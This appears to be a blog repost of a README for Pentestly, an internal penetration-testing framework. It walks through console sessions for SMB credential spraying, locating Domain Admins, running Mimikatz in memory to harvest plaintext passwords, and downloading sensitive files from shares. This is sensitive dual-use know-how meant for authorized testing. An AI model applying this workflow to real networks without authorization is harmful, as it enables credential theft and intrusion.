Pentestly: A Python and Powershell Internal Penetration Testing Framework Tool
Pentestly is a tool for penetration tests. It is a combination of expanding Python tools. The main aim of the Pentestly tool is to utilize the familiar user interface. With the power of Python, the contribution to the framework should be easy. Pentestly utilizes the power of Python, Powershell etc tools together in a familiar user experience.
These are the current tools utilized in Pentestly:
Invoke-Mimikatz.ps1 - By using this tool, we can easily implement Mimikatz in Powershell.
wmiexec.py - These tools enable us to execute Powershell commands quickly and easily via WMI.
recon-ng - For data manipulation recon-ng (Backend database) is beautifully made and leveraged.
smbmap.py - It is used for enumerating SMB shares.
powercat.ps1 - For providing Netcat-esque functionality in Powershell
Features of Pentestly:
>> It is able to import NMAP XML.
>> It can also enable to test SMB authentication using the following:
- credentials of an individual.
- file containing and null credentials.
- By using NTLM hash also.
>> For SMB authentication successful it can test local administrator privileges also.
>> It can also identify readable SMB shares for valid credentials
>> It also provides the feature of Storing Domain/Enterprise Admin account names.
>> It can easily determine a location of running Domain Admin processes and can also determine systems of logged in Domains Admins.
> It also provides a feature of executing Powershell commands in memory and exfil results and Mimikatz to gather plaintext password from memory.
How you can install it:
For installation you need to follow these steps or commands:
git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly
How you can use it:
Step 1-Workspace must be changed-
[pentestly][default] > workspaces list
+------------+
| Workspaces |
+------------+
| default |
+------------+
[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project
Step 2- Load from nmap
[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options
Name Current Value Required Description
-------- ------------- -------- -----------
FILENAME /root/PROJECT/full-all-alive.xml yes Path and filename for nmap XML input
[pentestly][project][nmap_xml] > run
Step 3- Test logins
For test logins use file with creds
[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run
Single username & password must be used
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
Use credentials over a small subset of IPs
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'
Step 4- Domain and Enterprise admins must be Gather
[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options
Name Current Value Required Description
------ ------------- -------- -----------
SOURCE default yes source of input (see 'show info' for details)
[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2
Step 6-Mimikatz should be run over IPs with executable rights
[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
For hosting scripts select the local interface
0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1
[*] Execution creds: domain\Admin:adminpassword@192.168.1.1
[*] Success! Admin.DA:p@$$w0rd - DOMAIN ADMIN!
Step 7- Show local admins
[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run
+---------------------------------------------------------------------------------------------------------------+
| host | access | username | password | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | | nsportsman | password1! | zojix | | | True | True | login |
+---------------------------------------------------------------------------------------------------------------+
Step 8-Show domain admins
[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run
+--------------------------------------------------------------------------------------------------------------------------+
| host | access | username | password | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin | TheRealDA | </l33TPassword> | zojix | | | True | True | login |
+--------------------------------------------------------------------------------------------------------------------------+
Step 9-Enumshares:
[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})
Step 10-Show new shares:
[pentestly][default][interesting_files] > show pentestly_shares
+------------------------------------------------------------------------------------------------+
| rowid | host | username | readwrite | readonly | noaccess | module |
+-------------------------------------------------------------------------------------------------+
| 1 | 192.168.224.252 | Administrator | | ADMIN$,C,C$,Users | IPC$ | enumshares |
+-------------------------------------------------------------------------------------------------+
Step 11-Find/Download interesting files
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- --------- -----------
PATTERN (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$ yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
Can change the pattern to something a bit more specialized
[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- -------- -----------
PATTERN important.txt|super_secret yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
Execute and download found files
[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt
Contributing:
Creating new modules is easy in Pentestly. Begin with the code provided in skeleton.py:
from libs.pentestlymodule import PentestlyModule
class Module(PentestlyModule):
meta = {
'name': 'Your module name goes here',
'author': 'Developer name goes here',
'description': 'Description of the module goes here',
'query': 'SQL QUERY whose result is passed to your module',
'options': (
('Option1', 'Default Value', Required-True/False, 'Description of option'),
),
}
def module_pre(self):
# Optional
# Happens before your module
def module_run(self, data):
# Required
# data is the result from the SQL query set in the options
### Few magic functions
# self.query - Perform an SQL query on the internal database
results = self.query("select * from pentestly_creds")
# self.output - print default information to the user
self.output("Performed an SQL query")
self.output(results)
# self.alert - print the successful message to the user
self.success("Yay! We performed successful work")
def module_post(self):
# Optional
# Happens after your module
TODO:
- secretsdump.py module should be implemented.
- Add utility functions for database queries similar to creds, services
- To have fixed width columns rework draw_table function
- Import credentials from Gladius
- Implement GPP password search and decrypt module
ليست هناك تعليقات:
إرسال تعليق